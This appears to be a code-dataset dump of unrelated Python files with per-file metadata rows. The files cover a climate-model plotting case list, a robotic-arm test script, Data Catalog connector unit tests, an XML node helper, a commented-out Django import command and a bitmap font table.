WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-09-18/wrf_lasso_stats_2018-09-18.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2018-09-18_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2018-09-18_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2018-09-18_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2018-09-18_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
LASSO_20181002 = {'name': 'lasso_20181002',
'description': "Comparing WRF-CLUBB output to WRF-LASSO output.",
'start_time': 301, 'end_time': 600,
'height_min_value': 0, 'height_max_value': 4000,
'blacklisted_vars': [],
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_benchmark_file': {'lasso_benchmark':
WRF_LASSO_BENCHMARK_OUTPUT_ROOT + "/2018-10-02/wrf_lasso_stats_2018-10-02.nc"},
'sam_benchmark_file': None,
'coamps_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'clubb_file': None,
'wrf_file': {'zm': clubb_output_root + '/lasso_2018-10-02_zm_wrf.nc',
'zt': clubb_output_root + '/lasso_2018-10-02_zt_wrf.nc',
'sfc': clubb_output_root + '/lasso_2018-10-02_sfc_wrf.nc',
'subcolumns': clubb_output_root + '/lasso_2018-10-02_nl_lh_sample_points_2D.nc'},
'var_groups': [VariableGroupBase, VariableGroupWs]}
# DO NOT EDIT THIS LIST UNLESS YOU ARE ADDING A NEW CASE. NEVER REMOVE CASES FROM THIS LIST.
# You may define a subset of cases at the end of this file.
ALL_CASES = [ARM, ARM_97, ASTEX_A209, ATEX,
BOMEX,
CGILS_S6, CGILS_S11, CGILS_S12, CLEX9_NOV02, CLEX9_OCT14,
DYCOMS2_RF01, DYCOMS2_RF01_FIXED_SST, DYCOMS2_RF02_DO,
DYCOMS2_RF02_DS, DYCOMS2_RF02_DS_RESTART,
DYCOMS2_RF02_ND, DYCOMS2_RF02_SO,
FIRE,
GABLS2, GABLS2_NIGHTLY, GABLS3, GABLS3_NIGHT, GATE_SHEAR_RLSF,
# IOP,
JUN25_ALTOCU,
LBA,
MC3E, MPACE_A, MPACE_B, MPACE_B_SILHS,
NEUTRAL, NOV11_ALTOCU,
RICO, RICO_SILHS,
TWP_ICE,
WANGARA,
LASSO_20170627, LASSO_20170717, LASSO_20170728, LASSO_20170923,
LASSO_20180911, LASSO_20180917, LASSO_20180918, LASSO_20181002
]
CASES_TO_PLOT = ALL_CASES
# If uncommented, this line will override the real CASES_TO_PLOT given above, forcing pyplotgen to only plot some cases.
# CASES_TO_PLOT = [ARM]
# CASES_TO_PLOT = CASES_TO_PLOT[:3]
| 55.181109 | 135 | 0.56254 | 6,984 | 63,679 | 4.701604 | 0.074599 | 0.098368 | 0.078694 | 0.06566 | 0.776495 | 0.753624 | 0.713485 | 0.650201 | 0.605981 | 0.574705 | 0 | 0.05372 | 0.317122 | 63,679 | 1,153 | 136 | 55.228968 | 0.701391 | 0.061527 | 0 | 0.541152 | 0 | 0.001029 | 0.376039 | 0.146891 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012346 | 0 | 0.012346 | 0.001029 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
595f827df47c5f2bdd1ecfb6bc095d61ca198a03 | 538 | py | Python | dynaban/tests/postion.py | laukik-hase/imitation_of_human_arm_on_robotic_manipulator | 995beb1ab41597ca6cbecd0baecdef1ef13450f9 | [
"MIT"
] | 3 | 2021-11-13T16:54:31.000Z | 2021-11-13T20:50:18.000Z | dynaban/tests/postion.py | laukik-hase/human_arm_imitation | 995beb1ab41597ca6cbecd0baecdef1ef13450f9 | [
"MIT"
] | null | null | null | dynaban/tests/postion.py | laukik-hase/human_arm_imitation | 995beb1ab41597ca6cbecd0baecdef1ef13450f9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import arm_control_utils
DURATION = 30000
TRAJ_POLY1 = [1000, 100, 100]
TORQUE_POLY1 = [1000, 100, 100]
MODE = 3
arm_control_utils.initialize_motors()
arm_control_utils.enable_state_torque()
arm_control_utils.set_debug(1, 0)
print("Ready to move")
arm_control_utils.set_position_trajectory(1, DURATION, TRAJ_POLY1, TORQUE_POLY1)
arm_control_utils.set_mode(1, MODE)
arm_control_utils.disable_state_torque()
arm_control_utils.stop_motors() | 28.315789 | 80 | 0.702602 | 74 | 538 | 4.702703 | 0.445946 | 0.229885 | 0.344828 | 0.155172 | 0.149425 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08 | 0.210037 | 538 | 19 | 81 | 28.315789 | 0.738824 | 0.037175 | 0 | 0 | 0 | 0 | 0.025097 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0.076923 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
595fa12df823f48a76595c65b488cfd3266708e8 | 5,758 | py | Python | google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py | mesmacosta/datacatalog-connectors | 74a4b6272cb00f2831b669d1a41133913f3df3fa | [
"Apache-2.0"
] | 53 | 2020-04-27T21:50:47.000Z | 2022-02-18T22:08:49.000Z | google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py | mesmacosta/datacatalog-connectors | 74a4b6272cb00f2831b669d1a41133913f3df3fa | [
"Apache-2.0"
] | 20 | 2020-05-26T13:51:45.000Z | 2022-01-25T00:06:19.000Z | google-datacatalog-connectors-commons/tests/google/datacatalog_connectors/commons/prepare/base_entry_factory_test.py | mesmacosta/datacatalog-connectors | 74a4b6272cb00f2831b669d1a41133913f3df3fa | [
"Apache-2.0"
] | 12 | 2020-04-30T22:14:02.000Z | 2021-10-09T03:44:39.000Z | #!/usr/bin/python
# coding=utf-8
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
from google.datacatalog_connectors.commons import prepare
class BaseEntryFactoryTestCase(unittest.TestCase):
__COMMONS_PACKAGE = 'google.datacatalog_connectors.commons'
__PREPARE_PACKAGE = '{}.prepare'.format(__COMMONS_PACKAGE)
def test_format_id_should_normalize_non_compliant_id(self):
formatted_id = prepare.BaseEntryFactory._format_id(u'ã123 - b456 ')
self.assertEqual('a123_b456', formatted_id)
def test_format_id_with_hashing_should_normalize_non_compliant_id(self):
long_str = 'organization_warehouse7192ecb2__personsc3a8d512_' \
'business_area_and_segment_of_marketing'
expected_str = 'organization_warehouse7192ecb2_personsc3a8d512_' \
'business_7074c286'
formatted_id = prepare.BaseEntryFactory._format_id_with_hashing(
long_str, hash_length=8)
self.assertEqual(expected_str, formatted_id)
def test_format_id_with_provided_pattern_should_normalize_non_compliant_id( # noqa: E501
self):
long_str = 'organization__warehouse7192ecb2__personsc3a8d512_' \
'business_area_and_segment_of_marketing'
expected_str = 'organization__warehouse7192ecb2_' \
'_personsc3a8d512_businesa4f7e655'
formatted_id = prepare.BaseEntryFactory._format_id_with_hashing(
long_str, regex_pattern=r'[^a-zA-Z0-9_]+')
self.assertEqual(expected_str, formatted_id)
def test_format_display_name_should_normalize_non_compliant_name(self):
formatted_name = prepare.BaseEntryFactory._format_display_name(
u'ã123 :?: b456 ')
self.assertEqual('a123 _ b456', formatted_name)
@mock.patch(
'{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE)
)
def test_format_linked_resource_should_not_normalize_compliant_string(
self, mock_truncate_string):
# Return same value received.
mock_truncate_string.side_effect = (lambda *args: args[0])
formatted_linked_resource = prepare.BaseEntryFactory.\
_format_linked_resource(
'hdfs://namenode:8020/user/hive/warehouse/table_company'
'_names_from_department_that_keeps_records_with_'
'historical_data_from_every_single_member')
self.assertEqual(
'hdfs://namenode:8020/user/hive/warehouse/'
'table_company_names_from_department_that_'
'keeps_records_with_historical_data_'
'from_every_single_member', formatted_linked_resource)
@mock.patch(
'{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE)
)
def test_format_linked_resource_should_normalize_non_compliant_string(
self, mock_truncate_string):
# Return same value received.
mock_truncate_string.side_effect = (lambda *args: args[0])
formatted_linked_resource = prepare.BaseEntryFactory. \
_format_linked_resource(
'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company'
'_names_from_?department?_that_;keeps;_records_with_'
'historical_data_from_every_single_member')
self.assertEqual(
'hdfs://_namenode_:8020/user/'
'_hive_/_warehouse_/table_company_names_from'
'__department__that__keeps__records_with_'
'historical_data_from_every_single_member',
formatted_linked_resource)
@mock.patch(
'{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE)
)
def test_format_linked_resource_should_not_normalize_non_compliant_string(
self, mock_truncate_string):
# Return same value received.
mock_truncate_string.side_effect = (lambda *args: args[0])
formatted_linked_resource = prepare.BaseEntryFactory. \
_format_linked_resource(
'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company'
'_names_from_?department?_that_;keeps;_records_with_'
'historical_data_from_every_single_member', False)
self.assertEqual(
'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company'
'_names_from_?department?_that_;keeps;_records_with_'
'historical_data_from_every_single_member',
formatted_linked_resource)
@mock.patch(
'{}.DataCatalogStringsHelper.truncate_string'.format(__PREPARE_PACKAGE)
)
def test_format_linked_resource_should_truncate_non_compliant_string(
self, mock_truncate_string):
expected_value = 'truncated_str...'
mock_truncate_string.return_value = expected_value
formatted_linked_resource = prepare.BaseEntryFactory. \
_format_linked_resource(
'hdfs://[namenode]:8020/user/{hive}/[warehouse]/table_company'
'_names_from_?department?_that_;keeps;_records_with_'
'historical_data_from_every_single_member')
self.assertEqual(expected_value, formatted_linked_resource)
| 42.029197 | 93 | 0.70719 | 620 | 5,758 | 6.058065 | 0.253226 | 0.059638 | 0.027689 | 0.037274 | 0.750532 | 0.727636 | 0.699947 | 0.682109 | 0.660277 | 0.633653 | 0 | 0.026955 | 0.213963 | 5,758 | 136 | 94 | 42.338235 | 0.802916 | 0.116881 | 0 | 0.51087 | 0 | 0 | 0.322804 | 0.302073 | 0 | 0 | 0 | 0 | 0.086957 | 1 | 0.086957 | false | 0 | 0.032609 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
5962222919ba8cf295722ccc3d990ff5fdab4dcc | 1,704 | py | Python | ota_xml_api/util/xml_base.py | mihira/opentravel-xml-api | 24d1ea4d24cf2575de474becaa665f6fc0d1971d | [
"MIT"
] | 3 | 2016-01-14T01:12:06.000Z | 2021-04-16T04:00:47.000Z | ota_xml_api/util/xml_base.py | mihira/opentravel-xml-api | 24d1ea4d24cf2575de474becaa665f6fc0d1971d | [
"MIT"
] | null | null | null | ota_xml_api/util/xml_base.py | mihira/opentravel-xml-api | 24d1ea4d24cf2575de474becaa665f6fc0d1971d | [
"MIT"
] | 2 | 2017-09-04T13:02:09.000Z | 2018-06-09T11:10:03.000Z | #!/usr/bin/env python
"""
This module contains the base xml Node and Period classes
"""
from xml.dom.minidom import getDOMImplementation
from date import Period
from constants import START, END
class XmlNode(object):
"""
the name of the class will define the name of the node by default.
classes inheriting this class will have their name set.
"""
_impl = getDOMImplementation()
def __init__(self, name=None, **attributes):
if not name:
name = self.__class__.__name__
self._doc = XmlNode._impl.createDocument(None, name, None)
self.element = self._doc.documentElement
for key, value in attributes.items():
self.set_attribute(key, value)
self.parent = None
def set_attribute(self, key, value):
self.element.setAttribute(key, str(value))
def set_parent(self, parent_node):
self.parent = parent_node
def add_child(self, child_node):
child_node.set_parent(self)
self.element.appendChild(child_node.element)
return child_node
def add_text(self, data):
text = self._doc.createTextNode(data)
self.element.appendChild(text)
return text
def __repr__(self):
return self.element.toxml()
class PeriodNode(XmlNode):
def __init__(self, *args, **kwargs):
XmlNode.__init__(self, *args, **kwargs)
self._period = None
self.set_period(Period())
def get_period(self):
return self._period
def set_period(self, period):
self.set_attribute(START, period.start)
self.set_attribute(END, period.end)
self._period = period
period = property(get_period, set_period)
| 27.483871 | 70 | 0.661385 | 215 | 1,704 | 5.004651 | 0.330233 | 0.051115 | 0.04461 | 0.022305 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242958 | 1,704 | 61 | 71 | 27.934426 | 0.834109 | 0.117958 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.076923 | 0.051282 | 0.512821 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
5986324fbdcbaeae05e084715dcadf5d8b4991a3 | 1,199 | py | Python | app/stages/management/commands/import_stages_from_csv.py | guilloulouis/stage_medecine | 7ec9067402e510d812a375bbfe46f2ab545587f9 | [
"MIT"
] | null | null | null | app/stages/management/commands/import_stages_from_csv.py | guilloulouis/stage_medecine | 7ec9067402e510d812a375bbfe46f2ab545587f9 | [
"MIT"
] | null | null | null | app/stages/management/commands/import_stages_from_csv.py | guilloulouis/stage_medecine | 7ec9067402e510d812a375bbfe46f2ab545587f9 | [
"MIT"
] | 1 | 2021-04-30T16:38:19.000Z | 2021-04-30T16:38:19.000Z | # from django.core.management import BaseCommand
# import pandas as pd
#
# from stages.models import Category, Stage
#
#
# class Command(BaseCommand):
# help = 'Import a list of stage in the database'
#
# def add_arguments(self, parser):
# super(Command, self).add_arguments(parser)
# parser.add_argument(
# '--csv', dest='csv', default=None,
# help='Specify the csv file to parse',
# )
#
# def handle(self, *args, **options):
# csv = options.get('csv')
# csv_reader = pd.read_csv(csv)
# stages_to_create = []
# for index, item in csv_reader.iterrows():
# stage_raw = item['Stage']
# split = stage_raw.split('(')
# stage_name = split[0].strip()
# if len(split) > 1:
# category_name = split[1].replace(')', '').strip()
# category_object, created = Category.objects.get_or_create(name=category_name)
# else:
# category_object = None
# stages_to_create.append(Stage(name=stage_name, place_max=item['places'], category=category_object))
# Stage.objects.bulk_create(stages_to_create)
| 37.46875 | 113 | 0.584654 | 139 | 1,199 | 4.863309 | 0.482014 | 0.035503 | 0.06213 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003488 | 0.282736 | 1,199 | 31 | 114 | 38.677419 | 0.782558 | 0.947456 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
59a09df4f04358386749f3598f84da0352793936 | 189 | py | Python | venv/Lib/site-packages/shiboken2/_config.py | gabistoian/Hide-Text-in-image | 88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5 | [
"X11"
] | null | null | null | venv/Lib/site-packages/shiboken2/_config.py | gabistoian/Hide-Text-in-image | 88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5 | [
"X11"
] | null | null | null | venv/Lib/site-packages/shiboken2/_config.py | gabistoian/Hide-Text-in-image | 88b5ef0bd2bcb0e222cfbc7abf6ac2b869f72ec5 | [
"X11"
] | null | null | null | shiboken_library_soversion = str(5.15)
version = "5.15.2.1"
version_info = (5, 15, 2.1, "", "")
__build_date__ = '2022-01-07T13:13:47+00:00'
__setup_py_package_version__ = '5.15.2.1'
| 15.75 | 44 | 0.671958 | 34 | 189 | 3.294118 | 0.617647 | 0.107143 | 0.107143 | 0.133929 | 0.214286 | 0 | 0 | 0 | 0 | 0 | 0 | 0.219512 | 0.132275 | 189 | 11 | 45 | 17.181818 | 0.463415 | 0 | 0 | 0 | 0 | 0 | 0.216931 | 0.132275 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
59ac4ecc150b88338555999e74b36af7366e76c2 | 271 | py | Python | method/boardInfo.py | gary920209/LightDance-RPi | 41d3ef536f3874fd5dbe092f5c9be42f7204427d | [
"MIT"
] | 2 | 2020-11-14T17:13:55.000Z | 2020-11-14T17:42:39.000Z | method/boardInfo.py | gary920209/LightDance-RPi | 41d3ef536f3874fd5dbe092f5c9be42f7204427d | [
"MIT"
] | null | null | null | method/boardInfo.py | gary920209/LightDance-RPi | 41d3ef536f3874fd5dbe092f5c9be42f7204427d | [
"MIT"
] | null | null | null | import os
from .baseMethod import BaseMethod
# BoardInfo
class BoardInfo(BaseMethod):
def method(self, payload):
info = [
"boardInfo",
{"name": os.name, "type": "dancer", "OK": True, "msg": "Success"},
]
return info
| 19.357143 | 78 | 0.553506 | 27 | 271 | 5.555556 | 0.703704 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.306273 | 271 | 13 | 79 | 20.846154 | 0.797872 | 0.03321 | 0 | 0 | 0 | 0 | 0.134615 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
59afd173c9893de34534a54b0f3445d6fe88b945 | 7,189 | py | Python | fonts/Org_01.py | cnobile2012/Python-TFT | 812a87e6f694eae338c3d9579ea98eae636f8f99 | [
"MIT"
] | null | null | null | fonts/Org_01.py | cnobile2012/Python-TFT | 812a87e6f694eae338c3d9579ea98eae636f8f99 | [
"MIT"
] | null | null | null | fonts/Org_01.py | cnobile2012/Python-TFT | 812a87e6f694eae338c3d9579ea98eae636f8f99 | [
"MIT"
] | null | null | null | # Org_v01 by Orgdot (www.orgdot.com/aliasfonts). A tiny,
# stylized font with all characters within a 6 pixel height.
Org_01Bitmaps = [
0xE8, 0xA0, 0x57, 0xD5, 0xF5, 0x00, 0xFD, 0x3E, 0x5F, 0x80, 0x88, 0x88,
0x88, 0x80, 0xF4, 0xBF, 0x2E, 0x80, 0x80, 0x6A, 0x40, 0x95, 0x80, 0xAA,
0x80, 0x5D, 0x00, 0xC0, 0xF0, 0x80, 0x08, 0x88, 0x88, 0x00, 0xFC, 0x63,
0x1F, 0x80, 0xF8, 0xF8, 0x7F, 0x0F, 0x80, 0xF8, 0x7E, 0x1F, 0x80, 0x8C,
0x7E, 0x10, 0x80, 0xFC, 0x3E, 0x1F, 0x80, 0xFC, 0x3F, 0x1F, 0x80, 0xF8,
0x42, 0x10, 0x80, 0xFC, 0x7F, 0x1F, 0x80, 0xFC, 0x7E, 0x1F, 0x80, 0x90,
0xB0, 0x2A, 0x22, 0xF0, 0xF0, 0x88, 0xA8, 0xF8, 0x4E, 0x02, 0x00, 0xFD,
0x6F, 0x0F, 0x80, 0xFC, 0x7F, 0x18, 0x80, 0xF4, 0x7D, 0x1F, 0x00, 0xFC,
0x21, 0x0F, 0x80, 0xF4, 0x63, 0x1F, 0x00, 0xFC, 0x3F, 0x0F, 0x80, 0xFC,
0x3F, 0x08, 0x00, 0xFC, 0x2F, 0x1F, 0x80, 0x8C, 0x7F, 0x18, 0x80, 0xF9,
0x08, 0x4F, 0x80, 0x78, 0x85, 0x2F, 0x80, 0x8D, 0xB1, 0x68, 0x80, 0x84,
0x21, 0x0F, 0x80, 0xFD, 0x6B, 0x5A, 0x80, 0xFC, 0x63, 0x18, 0x80, 0xFC,
0x63, 0x1F, 0x80, 0xFC, 0x7F, 0x08, 0x00, 0xFC, 0x63, 0x3F, 0x80, 0xFC,
0x7F, 0x29, 0x00, 0xFC, 0x3E, 0x1F, 0x80, 0xF9, 0x08, 0x42, 0x00, 0x8C,
0x63, 0x1F, 0x80, 0x8C, 0x62, 0xA2, 0x00, 0xAD, 0x6B, 0x5F, 0x80, 0x8A,
0x88, 0xA8, 0x80, 0x8C, 0x54, 0x42, 0x00, 0xF8, 0x7F, 0x0F, 0x80, 0xEA,
0xC0, 0x82, 0x08, 0x20, 0x80, 0xD5, 0xC0, 0x54, 0xF8, 0x80, 0xF1, 0xFF,
0x8F, 0x99, 0xF0, 0xF8, 0x8F, 0x1F, 0x99, 0xF0, 0xFF, 0x8F, 0x6B, 0xA4,
0xF9, 0x9F, 0x10, 0x8F, 0x99, 0x90, 0xF0, 0x55, 0xC0, 0x8A, 0xF9, 0x90,
0xF8, 0xFD, 0x63, 0x10, 0xF9, 0x99, 0xF9, 0x9F, 0xF9, 0x9F, 0x80, 0xF9,
0x9F, 0x20, 0xF8, 0x88, 0x47, 0x1F, 0x27, 0xC8, 0x42, 0x00, 0x99, 0x9F,
0x99, 0x97, 0x8C, 0x6B, 0xF0, 0x96, 0x69, 0x99, 0x9F, 0x10, 0x2E, 0x8F,
0x2B, 0x22, 0xF8, 0x89, 0xA8, 0x0F, 0xE0 ]
Org_01Glyphs = [
[ 0, 0, 0, 6, 0, 1 ], # 0x20 ' '
[ 0, 1, 5, 2, 0, -4 ], # 0x21 '!'
[ 1, 3, 1, 4, 0, -4 ], # 0x22 '"'
[ 2, 5, 5, 6, 0, -4 ], # 0x23 '#'
[ 6, 5, 5, 6, 0, -4 ], # 0x24 '$'
[ 10, 5, 5, 6, 0, -4 ], # 0x25 '%'
[ 14, 5, 5, 6, 0, -4 ], # 0x26 '&'
[ 18, 1, 1, 2, 0, -4 ], # 0x27 '''
[ 19, 2, 5, 3, 0, -4 ], # 0x28 '('
[ 21, 2, 5, 3, 0, -4 ], # 0x29 ')'
[ 23, 3, 3, 4, 0, -3 ], # 0x2A '#'
[ 25, 3, 3, 4, 0, -3 ], # 0x2B '+'
[ 27, 1, 2, 2, 0, 0 ], # 0x2C ','
[ 28, 4, 1, 5, 0, -2 ], # 0x2D '-'
[ 29, 1, 1, 2, 0, 0 ], # 0x2E '.'
[ 30, 5, 5, 6, 0, -4 ], # 0x2F '/'
[ 34, 5, 5, 6, 0, -4 ], # 0x30 '0'
[ 38, 1, 5, 2, 0, -4 ], # 0x31 '1'
[ 39, 5, 5, 6, 0, -4 ], # 0x32 '2'
[ 43, 5, 5, 6, 0, -4 ], # 0x33 '3'
[ 47, 5, 5, 6, 0, -4 ], # 0x34 '4'
[ 51, 5, 5, 6, 0, -4 ], # 0x35 '5'
[ 55, 5, 5, 6, 0, -4 ], # 0x36 '6'
[ 59, 5, 5, 6, 0, -4 ], # 0x37 '7'
[ 63, 5, 5, 6, 0, -4 ], # 0x38 '8'
[ 67, 5, 5, 6, 0, -4 ], # 0x39 '9'
[ 71, 1, 4, 2, 0, -3 ], # 0x3A ':'
[ 72, 1, 4, 2, 0, -3 ], # 0x3B ''
[ 73, 3, 5, 4, 0, -4 ], # 0x3C '<'
[ 75, 4, 3, 5, 0, -3 ], # 0x3D '='
[ 77, 3, 5, 4, 0, -4 ], # 0x3E '>'
[ 79, 5, 5, 6, 0, -4 ], # 0x3F '?'
[ 83, 5, 5, 6, 0, -4 ], # 0x40 '@'
[ 87, 5, 5, 6, 0, -4 ], # 0x41 'A'
[ 91, 5, 5, 6, 0, -4 ], # 0x42 'B'
[ 95, 5, 5, 6, 0, -4 ], # 0x43 'C'
[ 99, 5, 5, 6, 0, -4 ], # 0x44 'D'
[ 103, 5, 5, 6, 0, -4 ], # 0x45 'E'
[ 107, 5, 5, 6, 0, -4 ], # 0x46 'F'
[ 111, 5, 5, 6, 0, -4 ], # 0x47 'G'
[ 115, 5, 5, 6, 0, -4 ], # 0x48 'H'
[ 119, 5, 5, 6, 0, -4 ], # 0x49 'I'
[ 123, 5, 5, 6, 0, -4 ], # 0x4A 'J'
[ 127, 5, 5, 6, 0, -4 ], # 0x4B 'K'
[ 131, 5, 5, 6, 0, -4 ], # 0x4C 'L'
[ 135, 5, 5, 6, 0, -4 ], # 0x4D 'M'
[ 139, 5, 5, 6, 0, -4 ], # 0x4E 'N'
[ 143, 5, 5, 6, 0, -4 ], # 0x4F 'O'
[ 147, 5, 5, 6, 0, -4 ], # 0x50 'P'
[ 151, 5, 5, 6, 0, -4 ], # 0x51 'Q'
[ 155, 5, 5, 6, 0, -4 ], # 0x52 'R'
[ 159, 5, 5, 6, 0, -4 ], # 0x53 'S'
[ 163, 5, 5, 6, 0, -4 ], # 0x54 'T'
[ 167, 5, 5, 6, 0, -4 ], # 0x55 'U'
[ 171, 5, 5, 6, 0, -4 ], # 0x56 'V'
[ 175, 5, 5, 6, 0, -4 ], # 0x57 'W'
[ 179, 5, 5, 6, 0, -4 ], # 0x58 'X'
[ 183, 5, 5, 6, 0, -4 ], # 0x59 'Y'
[ 187, 5, 5, 6, 0, -4 ], # 0x5A 'Z'
[ 191, 2, 5, 3, 0, -4 ], # 0x5B '['
[ 193, 5, 5, 6, 0, -4 ], # 0x5C '\'
[ 197, 2, 5, 3, 0, -4 ], # 0x5D ']'
[ 199, 3, 2, 4, 0, -4 ], # 0x5E '^'
[ 200, 5, 1, 6, 0, 1 ], # 0x5F '_'
[ 201, 1, 1, 2, 0, -4 ], # 0x60 '`'
[ 202, 4, 4, 5, 0, -3 ], # 0x61 'a'
[ 204, 4, 5, 5, 0, -4 ], # 0x62 'b'
[ 207, 4, 4, 5, 0, -3 ], # 0x63 'c'
[ 209, 4, 5, 5, 0, -4 ], # 0x64 'd'
[ 212, 4, 4, 5, 0, -3 ], # 0x65 'e'
[ 214, 3, 5, 4, 0, -4 ], # 0x66 'f'
[ 216, 4, 5, 5, 0, -3 ], # 0x67 'g'
[ 219, 4, 5, 5, 0, -4 ], # 0x68 'h'
[ 222, 1, 4, 2, 0, -3 ], # 0x69 'i'
[ 223, 2, 5, 3, 0, -3 ], # 0x6A 'j'
[ 225, 4, 5, 5, 0, -4 ], # 0x6B 'k'
[ 228, 1, 5, 2, 0, -4 ], # 0x6C 'l'
[ 229, 5, 4, 6, 0, -3 ], # 0x6D 'm'
[ 232, 4, 4, 5, 0, -3 ], # 0x6E 'n'
[ 234, 4, 4, 5, 0, -3 ], # 0x6F 'o'
[ 236, 4, 5, 5, 0, -3 ], # 0x70 'p'
[ 239, 4, 5, 5, 0, -3 ], # 0x71 'q'
[ 242, 4, 4, 5, 0, -3 ], # 0x72 'r'
[ 244, 4, 4, 5, 0, -3 ], # 0x73 's'
[ 246, 5, 5, 6, 0, -4 ], # 0x74 't'
[ 250, 4, 4, 5, 0, -3 ], # 0x75 'u'
[ 252, 4, 4, 5, 0, -3 ], # 0x76 'v'
[ 254, 5, 4, 6, 0, -3 ], # 0x77 'w'
[ 257, 4, 4, 5, 0, -3 ], # 0x78 'x'
[ 259, 4, 5, 5, 0, -3 ], # 0x79 'y'
[ 262, 4, 4, 5, 0, -3 ], # 0x7A 'z'
[ 264, 3, 5, 4, 0, -4 ], # 0x7B '['
[ 266, 1, 5, 2, 0, -4 ], # 0x7C '|'
[ 267, 3, 5, 4, 0, -4 ], # 0x7D ']'
[ 269, 5, 3, 6, 0, -3 ] ] # 0x7E '~'
Org_01 = [
Org_01Bitmaps,
Org_01Glyphs,
0x20, 0x7E, 7 ]
# Approx. 943 bytes
